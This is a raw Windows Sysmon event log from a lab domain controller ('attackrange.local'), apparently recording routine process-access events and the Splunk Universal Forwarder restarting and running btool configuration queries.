13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.810{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.825{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.794{59A5CD1D-8EE0-6005-A400-00000000A301}29404196C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.544{59A5CD1D-8EE0-6005-A300-00000000A301}49564936C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.550{59A5CD1D-8EE0-6005-A400-00000000A301}2940C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
